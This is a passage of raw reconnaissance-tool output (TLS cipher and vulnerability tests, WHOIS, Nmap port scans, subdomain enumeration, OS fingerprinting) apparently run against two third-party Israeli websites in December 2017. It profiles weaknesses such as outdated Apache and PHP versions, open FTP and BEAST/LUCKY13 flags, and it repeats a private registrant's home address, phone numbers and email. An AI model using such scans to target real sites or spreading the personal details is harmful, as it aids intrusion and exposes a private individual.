  1398.  Strong encryption (AEAD ciphers) offered (OK)
  1399.  
  1400.  
  1401.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  1402.  
  1403.  PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
  1404. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
  1405. DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-CCM8
  1406. DHE-RSA-AES256-CCM DHE-RSA-AES256-SHA256
  1407. DHE-RSA-AES256-SHA ECDHE-RSA-CAMELLIA256-SHA384
  1408. DHE-RSA-CAMELLIA256-SHA256
  1409. DHE-RSA-CAMELLIA256-SHA
  1410. ECDHE-RSA-AES128-GCM-SHA256
  1411. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
  1412. DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-CCM8
  1413. DHE-RSA-AES128-CCM DHE-RSA-AES128-SHA256
  1414. DHE-RSA-AES128-SHA ECDHE-RSA-CAMELLIA128-SHA256
  1415. DHE-RSA-CAMELLIA128-SHA256
  1416. DHE-RSA-CAMELLIA128-SHA
  1417.  Elliptic curves offered: prime256v1 secp384r1 secp521r1 X25519
  1418.  
  1419.  
  1420.  Testing server preferences 
  1421.  
  1422.  Has server cipher order? yes (OK)
  1423.  Negotiated protocol TLSv1.2
  1424.  Negotiated cipher ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1425.  Cipher order
  1426. TLSv1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA DHE-RSA-AES128-SHA
  1427. DHE-RSA-AES256-SHA AES128-SHA AES256-SHA DHE-RSA-CAMELLIA256-SHA
  1428. DHE-RSA-CAMELLIA128-SHA CAMELLIA256-SHA CAMELLIA128-SHA
  1429. TLSv1.1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA DHE-RSA-AES128-SHA
  1430. DHE-RSA-AES256-SHA AES128-SHA AES256-SHA DHE-RSA-CAMELLIA256-SHA
  1431. DHE-RSA-CAMELLIA128-SHA CAMELLIA256-SHA CAMELLIA128-SHA
  1432. TLSv1.2: ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES256-GCM-SHA384
  1433. DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES256-GCM-SHA384
  1434. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
  1435. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
  1436. DHE-RSA-AES128-SHA256 DHE-RSA-AES128-SHA DHE-RSA-AES256-SHA256
  1437. DHE-RSA-AES256-SHA AES128-GCM-SHA256 AES256-GCM-SHA384
  1438. AES128-SHA256 AES256-SHA256 AES128-SHA AES256-SHA
  1439. DHE-RSA-AES256-CCM8 DHE-RSA-AES256-CCM DHE-RSA-AES128-CCM8
  1440. DHE-RSA-AES128-CCM AES256-CCM8 AES256-CCM AES128-CCM8 AES128-CCM
  1441. ECDHE-RSA-CAMELLIA256-SHA384 DHE-RSA-CAMELLIA256-SHA256
  1442. ECDHE-RSA-CAMELLIA128-SHA256 DHE-RSA-CAMELLIA128-SHA256
  1443. DHE-RSA-CAMELLIA256-SHA DHE-RSA-CAMELLIA128-SHA
  1444. CAMELLIA256-SHA256 CAMELLIA128-SHA256 CAMELLIA256-SHA
  1445. CAMELLIA128-SHA
  1446.  
  1447.  
  1448.  Testing server defaults (Server Hello) 
  1449.  
  1450.  TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
  1451. "EC point formats/#11" "session ticket/#35"
  1452. "next protocol/#13172" "encrypt-then-mac/#22"
  1453. "extended master secret/#23"
  1454. "application layer protocol negotiation/#16"
  1455.  Session Ticket RFC 5077 hint 300 seconds, session tickets keys seems to be rotated < daily
  1456.  SSL Session ID support yes
  1457.  Session Resumption Tickets: yes, ID: yes
  1458.  TLS clock skew Random values, no fingerprinting possible
  1459.  Signature Algorithm SHA256 with RSA
  1460.  Server key size RSA 4096 bits
  1461.  Fingerprint / Serial SHA1 06E4539A1F048BB207D5538EA099E56D0044BB51 / 2A0FF6BFE1C614B2F20E230E0A1803A9
  1462. SHA256 8442AD6BDF1A497ACA110FBD39AA14B30A6A7772614DAB672421D2B2227B439A
  1463.  Common Name (CN) *.spd.co.il
  1464.  subjectAltName (SAN) *.spd.co.il spd.co.il 
  1465.  Issuer RapidSSL SHA256 CA - G2 (GeoTrust Inc. from US)
  1466.  Trust (hostname) certificate does not match supplied URI (same w/o SNI)
  1467.  Chain of trust NOT ok (chain incomplete)
  1468.  EV cert (experimental) no
  1469.  Certificate Expiration 550 >= 60 days (2016-07-03 20:00 --> 2019-07-04 19:59 -0400)
  1470.  # of certificates provided 7
  1471.  Certificate Revocation List http://gs.symcb.com/gs.crl
  1472.  OCSP URI http://gs.symcd.com
  1473.  OCSP stapling not offered
  1474.  OCSP must staple no
  1475.  DNS CAA RR (experimental) not offered
  1476.  Certificate Transparency yes (certificate extension)
  1477.  
  1478.  
  1479.  Testing HTTP header response @ "/" 
  1480.  
  1481.  HTTP Status Code  307 Temporary Redirect, redirecting to "https://sleep4u.co.il/"
  1482.  HTTP clock skew -1 sec from localtime
  1483.  Strict Transport Security --
  1484.  Public Key Pinning --
  1485.  Server banner nginx
  1486.  Application banner --
  1487.  Cookie(s) 1 issued: NOT secure, NOT HttpOnly -- HTTP status 307 signals you maybe missed the web application
  1488.  Security headers --
  1489.  Reverse Proxy banner --
  1490.  
  1491.  
  1492.  Testing vulnerabilities 
  1493.  
  1494.  Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  1495.  CCS (CVE-2014-0224) not vulnerable (OK)
  1496.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK)
  1497.  ROBOT not vulnerable (OK)
  1498.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  1499.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  1500.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  1501.  BREACH (CVE-2013-3587) failed (HTTP header request stalled and was terminated) 
  1502.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  1503.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  1504.  SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
  1505.  FREAK (CVE-2015-0204) not vulnerable (OK)
  1506.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  1507. make sure you don't use this certificate elsewhere with SSLv2 enabled services
  1508. https://censys.io/ipv4?q=8442AD6BDF1A497ACA110FBD39AA14B30A6A7772614DAB672421D2B2227B439A could help you to find out
  1509.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no common primes detected
  1510.  BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES128-SHA
  1511. ECDHE-RSA-AES256-SHA
  1512. DHE-RSA-AES128-SHA
  1513. DHE-RSA-AES256-SHA AES128-SHA
  1514. AES256-SHA
  1515. DHE-RSA-CAMELLIA256-SHA
  1516. DHE-RSA-CAMELLIA128-SHA
  1517. CAMELLIA256-SHA
  1518. CAMELLIA128-SHA 
  1519. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  1520.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  1521.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  1522.  
  1523.  
  1524.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  1525.  
  1526. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  1527. -----------------------------------------------------------------------------------------------------------------------------
  1528. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
  1529. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
  1530. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
  1531. x9f DHE-RSA-AES256-GCM-SHA384 DH 2048 AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
  1532. xc0a3 DHE-RSA-AES256-CCM8 DH 2048 AESCCM8 256 TLS_DHE_RSA_WITH_AES_256_CCM_8
  1533. xc09f DHE-RSA-AES256-CCM DH 2048 AESCCM 256 TLS_DHE_RSA_WITH_AES_256_CCM
  1534. x6b DHE-RSA-AES256-SHA256 DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
  1535. x39 DHE-RSA-AES256-SHA DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
  1536. xc077 ECDHE-RSA-CAMELLIA256-SHA384 ECDH 256 Camellia 256 TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384
  1537. xc4 DHE-RSA-CAMELLIA256-SHA256 DH 2048 Camellia 256 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256
  1538. x88 DHE-RSA-CAMELLIA256-SHA DH 2048 Camellia 256 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
  1539. x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
  1540. xc0a1 AES256-CCM8 RSA AESCCM8 256 TLS_RSA_WITH_AES_256_CCM_8
  1541. xc09d AES256-CCM RSA AESCCM 256 TLS_RSA_WITH_AES_256_CCM
  1542. x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
  1543. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
  1544. xc0 CAMELLIA256-SHA256 RSA Camellia 256 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256
  1545. x84 CAMELLIA256-SHA RSA Camellia 256 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
  1546. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
  1547. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
  1548. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
  1549. x9e DHE-RSA-AES128-GCM-SHA256 DH 2048 AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
  1550. xc0a2 DHE-RSA-AES128-CCM8 DH 2048 AESCCM8 128 TLS_DHE_RSA_WITH_AES_128_CCM_8
  1551. xc09e DHE-RSA-AES128-CCM DH 2048 AESCCM 128 TLS_DHE_RSA_WITH_AES_128_CCM
  1552. xc0a0 AES128-CCM8 RSA AESCCM8 128 TLS_RSA_WITH_AES_128_CCM_8
  1553. xc09c AES128-CCM RSA AESCCM 128 TLS_RSA_WITH_AES_128_CCM
  1554. x67 DHE-RSA-AES128-SHA256 DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
  1555. x33 DHE-RSA-AES128-SHA DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
  1556. xc076 ECDHE-RSA-CAMELLIA128-SHA256 ECDH 256 Camellia 128 TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
  1557. xbe DHE-RSA-CAMELLIA128-SHA256 DH 2048 Camellia 128 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
  1558. x45 DHE-RSA-CAMELLIA128-SHA DH 2048 Camellia 128 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
  1559. x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
  1560. x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
  1561. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
  1562. xba CAMELLIA128-SHA256 RSA Camellia 128 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256
  1563. x41 CAMELLIA128-SHA RSA Camellia 128 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
  1564.  
  1565.  
  1566.  Running client simulations via sockets 
  1567.  
  1568. Android 2.3.7 TLSv1.0 DHE-RSA-AES128-SHA, 2048 bit DH
  1569. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  1570. Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  1571. Android 4.4.2 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1572. Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1573. Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1574. Android 7.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  1575. Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  1576. Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  1577. Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1578. Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  1579. IE 6 XP No connection
  1580. IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  1581. IE 8 XP No connection
  1582. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  1583. IE 11 Win 7 TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
  1584. IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
  1585. IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
  1586. IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1587. Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1588. Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1589. Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  1590. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  1591. Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  1592. Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1593. Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1594. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1595. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  1596. Java 6u45 No connection
  1597. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  1598. Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1599. OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1600. OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  1601.  
  1602.  Done 2017-12-30 22:31:04 [ 544s] -->> 62.128.59.221:443 (sleep4u.co.il) <<--
  1603.  
  1604. #######################################################################################################################################
  1605. Hostname www.hapetek.co.il ISP 013 NetVision Ltd (AS1680)
  1606. Continent Asia Flag
  1607. IL
  1608. Country Israel Country Code IL (ISR)
  1609. Region Unknown Local time 30 Dec 2017 22:44 IST
  1610. City Unknown Latitude 31.5
  1611. IP Address 212.143.6.110 Longitude 34.75
  1612. #######################################################################################################################################
  1613. [i] Scanning Site: http://hapetek.co.il
  1614.  
  1615.  
  1616.  
  1617. B A S I C I N F O
  1618. ====================
  1619.  
  1620.  
  1621. [+] Site Title: הפתק | פורטל הסטודנטים
  1622. [+] IP address: 212.143.6.110
  1623. [+] Web Server: Apache/2.2.14 (Ubuntu)
  1624. [+] CMS: WordPress
  1625. [+] Cloudflare: Not Detected
  1626. [+] Robots File: Could NOT Find robots.txt!
  1627.  
  1628.  
  1629.  
  1630.  
  1631. W H O I S L O O K U P
  1632. ========================
  1633.  
  1634.  
  1635. % The data in the WHOIS database of the .il registry is provided
  1636. % by ISOC-IL for information purposes, and to assist persons in
  1637. % obtaining information about or related to a domain name
  1638. % registration record. ISOC-IL does not guarantee its accuracy.
  1639. % By submitting a WHOIS query, you agree that you will use this
  1640. % Data only for lawful purposes and that, under no circumstances
  1641. % will you use this Data to: (1) allow, enable, or otherwise
  1642. % support the transmission of mass unsolicited, commercial
  1643. % advertising or solicitations via e-mail (spam);
  1644. % or (2) enable high volume, automated, electronic processes that
  1645. % apply to ISOC-IL (or its systems).
  1646. % ISOC-IL reserves the right to modify these terms at any time.
  1647. % By submitting this query, you agree to abide by this policy.
  1648.  
  1649. query: hapetek.co.il
  1650.  
  1651. reg-name: hapetek
  1652. domain: hapetek.co.il
  1653.  
  1654. descr: Avi Bandel
  1655. descr: Pinsker 36
  1656. descr: Kiryat Atta
  1657. descr: 28012
  1658. descr: Israel
  1659. phone: +972 4 8441288
  1660. e-mail: avibandl AT netvision.net.il
  1661. admin-c: LD-AB16005-IL
  1662. tech-c: LD-AB16005-IL
  1663. zone-c: LD-AB16005-IL
  1664. nserver: dns.netvision.net.il
  1665. nserver: nypop.elron.net
  1666. validity: 18-12-2018
  1667. DNSSEC: unsigned
  1668. status: Transfer Locked
  1669. changed: domain-registrar AT isoc.org.il 20051218 (Assigned)
  1670. changed: domain-registrar AT isoc.org.il 20061112 (Changed)
  1671. changed: domain-registrar AT isoc.org.il 20061112 (Changed)
  1672. changed: domain-registrar AT isoc.org.il 20071101 (Transferred)
  1673. changed: domain-registrar AT isoc.org.il 20090108 (Changed)
  1674.  
  1675. person: avi bandel
  1676. address: pinsker 36
  1677. address: kiryat atta
  1678. address: 28012
  1679. address: Israel
  1680. phone: +972 77 3425284
  1681. e-mail: avibandl AT netvision.net.il
  1682. nic-hdl: LD-AB16005-IL
  1683. changed: Managing Registrar 20070421
  1684.  
  1685. registrar name: LiveDns Ltd
  1686. registrar info: http://domains.livedns.co.il
  1687.  
  1688. % Rights to the data above are restricted by copyright.
  1689.  
  1690.  
  1691.  
  1692.  
  1693. G E O I P L O O K U P
  1694. =========================
  1695.  
  1696. [i] IP Address: 212.143.6.110
  1697. [i] Country: IL
  1698. [i] State: N/A
  1699. [i] City: N/A
  1700. [i] Latitude: 31.500000
  1701. [i] Longitude: 34.750000
  1702.  
  1703.  
  1704.  
  1705.  
  1706. H T T P H E A D E R S
  1707. =======================
  1708.  
  1709.  
  1710. [i] HTTP/1.0 301 Moved Permanently
  1711. [i] Date: Sat, 30 Dec 2017 22:44:57 GMT
  1712. [i] Server: Apache/2.2.14 (Ubuntu)
  1713. [i] X-Powered-By: PHP/5.3.2-1ubuntu4.11
  1714. [i] X-Pingback: http://www.hapetek.co.il/xmlrpc.php
  1715. [i] Location: http://www.hapetek.co.il/
  1716. [i] Content-Length: 0
  1717. [i] Connection: close
  1718. [i] Content-Type: text/html; charset=UTF-8
  1719. [i] HTTP/1.0 200 OK
  1720. [i] Date: Sat, 30 Dec 2017 22:45:00 GMT
  1721. [i] Server: Apache/2.2.14 (Ubuntu)
  1722. [i] X-Powered-By: PHP/5.3.2-1ubuntu4.11
  1723. [i] X-Pingback: http://www.hapetek.co.il/xmlrpc.php
  1724. [i] Connection: close
  1725. [i] Content-Type: text/html; charset=UTF-8
  1726.  
  1727.  
  1728.  
  1729.  
  1730. D N S L O O K U P
  1731. ===================
  1732.  
  1733. hapetek.co.il. 14399 IN NS dns.netvision.net.il.
  1734. hapetek.co.il. 14399 IN NS ns1.hapetek.co.il.
  1735. hapetek.co.il. 14399 IN NS ns2.hapetek.co.il.
  1736. hapetek.co.il. 14399 IN NS nypop.elron.net.
  1737. hapetek.co.il. 14399 IN A 212.143.6.110
  1738. hapetek.co.il. 14399 IN SOA ns1.hapetek.co.il. ns2.hapetek.co.il. 20131127 28800 7200 864000 86400
  1739.  
  1740.  
  1741.  
  1742.  
  1743. S U B N E T C A L C U L A T I O N
  1744. ====================================
  1745.  
  1746. Address = 212.143.6.110
  1747. Network = 212.143.6.110 / 32
  1748. Netmask = 255.255.255.255
  1749. Broadcast = not needed on Point-to-Point links
  1750. Wildcard Mask = 0.0.0.0
  1751. Hosts Bits = 0
  1752. Max. Hosts = 1 (2^0 - 0)
  1753. Host Range = { 212.143.6.110 - 212.143.6.110 }
  1754.  
  1755.  
  1756.  
  1757. N M A P P O R T S C A N
  1758. ============================
  1759.  
  1760.  
  1761. Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-30 20:48 UTC
  1762. Nmap scan report for hapetek.co.il (212.143.6.110)
  1763. Host is up (0.14s latency).
  1764. PORT STATE SERVICE VERSION
  1765. 21/tcp open ftp vsftpd 2.0.8 or later
  1766. 22/tcp closed ssh
  1767. 23/tcp closed telnet
  1768. 25/tcp filtered smtp
  1769. 80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
  1770. 110/tcp filtered pop3
  1771. 143/tcp filtered imap
  1772. 443/tcp open ssl/https?
  1773. 445/tcp filtered microsoft-ds
  1774. 3389/tcp filtered ms-wbt-server
  1775. Service Info: Host: Hapetek
  1776.  
  1777. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1778. Nmap done: 1 IP address (1 host up) scanned in 14.01 seconds
  1779.  
  1780.  
  1781.  
  1782. S U B - D O M A I N F I N D E R
  1783. ==================================
  1784.  
  1785.  
  1786. [i] Total Subdomains Found : 2
  1787.  
  1788. [+] Subdomain: ns2.hapetek.co.il
  1789. [-] IP: 212.143.6.114
  1790.  
  1791. [+] Subdomain: www.hapetek.co.il
  1792. [-] IP: 212.143.6.110
  1793.  
  1794.  
  1795. [!] IP Address : 212.143.6.110
  1796. [!] Server: Apache/2.2.14 (Ubuntu)
  1797. [!] Powered By: PHP/5.3.2-1ubuntu4.11
  1798. [-] Clickjacking protection is not in place.
  1799. [+] Operating System : Ubuntu
  1800. [!] www.hapetek.co.il doesn't seem to use a CMS
  1801. [+] Honeypot Probabilty: 0%
  1802. ----------------------------------------
  1803. PORT STATE SERVICE VERSION
  1804. 21/tcp open ftp vsftpd 2.0.8 or later
  1805. 22/tcp closed ssh
  1806. 23/tcp closed telnet
  1807. 25/tcp filtered smtp
  1808. 80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
  1809. 110/tcp filtered pop3
  1810. 143/tcp filtered imap
  1811. 443/tcp open ssl/https?
  1812. 445/tcp filtered microsoft-ds
  1813. 3389/tcp filtered ms-wbt-server
  1814. ----------------------------------------
  1815.  
  1816. [+] DNS Records
  1817.  
  1818. [+] Host Records (A)
  1819. www.hapetek.co.ilHTTP: (212.143.6.110) AS1680 013 NetVision Ltd Israel
  1820.  
  1821. [+] TXT Records
  1822.  
  1823. [+] DNS Map: https://dnsdumpster.com/static/map/www.hapetek.co.il.png
  1824.  
  1825. [>] Initiating 3 intel modules
  1826. [>] Loading Alpha module (1/3)
  1827. [>] Beta module deployed (2/3)
  1828. [>] Crawling the target for fuzzable URLs
  1829.  
  1830. Target: http://hapetek.co.il
  1831.  
  1832. Server: Apache/2.2.14 (Ubuntu)
  1833. X-Powered-By: PHP/5.3.2-1ubuntu4.11
  1834.  
  1835.  
  1836. ## Checking if the target has deployed an Anti-Scanner measure
  1837.  
  1838. [!] Scanning Passed ..... OK
  1839.  
  1840.  
  1841. ## Detecting Joomla! based Firewall ...
  1842.  
  1843. [!] .htaccess shipped with Joomla! is being deployed for SEO purpose
  1844. [!] It contains some defensive mod_rewrite rules
  1845. [!] Payloads that contain strings (mosConfig,base64_encode,<script>
  1846. GLOBALS,_REQUEST) wil be responsed with 403.
  1847.  
  1848.  
  1849. ## Fingerprinting in progress ...
  1850.  
  1851. ~Unable to detect the version. Is it sure a Joomla?
  1852.  
  1853. ## Fingerprinting done.
  1854. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  1855. Server: 192.168.1.254
  1856. Address: 192.168.1.254#53
  1857.  
  1858. Non-authoritative answer:
  1859. Name: hapetek.co.il
  1860. Address: 212.143.6.110
  1861.  
  1862. hapetek.co.il has address 212.143.6.110
  1863.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  1864.  
  1865. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  1866.  
  1867. [+] Target is hapetek.co.il
  1868. [+] Loading modules.
  1869. [+] Following modules are loaded:
  1870. [x] [1] ping:icmp_ping - ICMP echo discovery module
  1871. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  1872. [x] [3] ping:udp_ping - UDP-based ping discovery module
  1873. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  1874. [x] [5] infogather:portscan - TCP and UDP PortScanner
  1875. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  1876. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  1877. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  1878. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  1879. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  1880. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  1881. [x] [12] fingerprint:smb - SMB fingerprinting module
  1882. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  1883. [+] 13 modules registered
  1884. [+] Initializing scan engine
  1885. [+] Running scan engine
  1886. [-] ping:tcp_ping module: no closed/open TCP ports known on 212.143.6.110. Module test failed
  1887. [-] ping:udp_ping module: no closed/open UDP ports known on 212.143.6.110. Module test failed
  1888. [-] No distance calculation. 212.143.6.110 appears to be dead or no ports known
  1889. [+] Host: 212.143.6.110 is down (Guess probability: 0%)
  1890. [+] Cleaning up scan engine
  1891. [+] Modules deinitialized
  1892. [+] Execution completed.
  1893.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  1894.  
  1895. % The data in the WHOIS database of the .il registry is provided
  1896. % by ISOC-IL for information purposes, and to assist persons in
  1897. % obtaining information about or related to a domain name
  1898. % registration record. ISOC-IL does not guarantee its accuracy.
  1899. % By submitting a WHOIS query, you agree that you will use this
  1900. % Data only for lawful purposes and that, under no circumstances
  1901. % will you use this Data to: (1) allow, enable, or otherwise
  1902. % support the transmission of mass unsolicited, commercial
  1903. % advertising or solicitations via e-mail (spam);
  1904. % or (2) enable high volume, automated, electronic processes that
  1905. % apply to ISOC-IL (or its systems).
  1906. % ISOC-IL reserves the right to modify these terms at any time.
  1907. % By submitting this query, you agree to abide by this policy.
  1908.  
  1909. query: hapetek.co.il
  1910.  
  1911. reg-name: hapetek
  1912. domain: hapetek.co.il
  1913.  
  1914. descr: Avi Bandel
  1915. descr: Pinsker 36
  1916. descr: Kiryat Atta
  1917. descr: 28012
  1918. descr: Israel
  1919. phone: +972 4 8441288
  1920. e-mail: avibandl AT netvision.net.il
  1921. admin-c: LD-AB16005-IL
  1922. tech-c: LD-AB16005-IL
  1923. zone-c: LD-AB16005-IL
  1924. nserver: dns.netvision.net.il
  1925. nserver: nypop.elron.net
  1926. validity: 18-12-2018
  1927. DNSSEC: unsigned
  1928. status: Transfer Locked
  1929. changed: domain-registrar AT isoc.org.il 20051218 (Assigned)
  1930. changed: domain-registrar AT isoc.org.il 20061112 (Changed)
  1931. changed: domain-registrar AT isoc.org.il 20061112 (Changed)
  1932. changed: domain-registrar AT isoc.org.il 20071101 (Transferred)
  1933. changed: domain-registrar AT isoc.org.il 20090108 (Changed)
  1934.  
  1935. person: avi bandel
  1936. address: pinsker 36
  1937. address: kiryat atta
  1938. address: 28012
  1939. address: Israel
  1940. phone: +972 77 3425284
  1941. e-mail: avibandl AT netvision.net.il
  1942. nic-hdl: LD-AB16005-IL
  1943. changed: Managing Registrar 20070421
  1944.  
  1945. registrar name: LiveDns Ltd
  1946. registrar info: http://domains.livedns.co.il
  1947.  
  1948. % Rights to the data above are restricted by copyright.
  1949.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  1950.  
  1951. *******************************************************************
  1952. * *
  1953. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  1954. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  1955. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  1956. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  1957. * *
  1958. * TheHarvester Ver. 2.7 *
  1959. * Coded by Christian Martorella *
  1960. * Edge-Security Research *
  1961. * cmartorella@edge-security.com *
  1962. *******************************************************************
  1963.  
  1964.  
